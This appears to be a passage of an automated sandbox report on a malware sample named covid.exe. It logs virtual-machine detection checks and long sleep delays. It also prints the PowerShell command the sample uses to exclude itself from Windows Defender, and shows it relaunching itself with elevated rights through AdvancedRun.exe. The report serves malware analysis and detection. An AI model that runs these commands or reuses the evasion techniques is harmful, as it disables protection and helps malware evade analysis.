Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
Source: C:\Users\user\Desktop\covid.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\covid.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\covid.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\Desktop\covid.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\covid.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\covid.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4853
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2097
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5103
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2140
Source: C:\Users\user\Desktop\covid.exe TID: 5756Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\covid.exe TID: 5744Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 4853 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep count: 52 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep count: 2097 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6980Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\Desktop\covid.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\covid.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000010.00000003.423793477.0000000004F7B000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 00000010.00000003.423793477.0000000004F7B000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: covid.exe, 00000000.00000003.236324097.0000000005B2B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW*L
Source: covid.exe, 00000000.00000003.236350637.0000000000C2F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: AdvancedRun.exe, 00000005.00000002.281611272.0000000000628000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\covid.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\covid.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Adds a directory exclusion to Windows DefenderShow sources
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Users\user\Desktop\covid.exe VolumeInformation
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
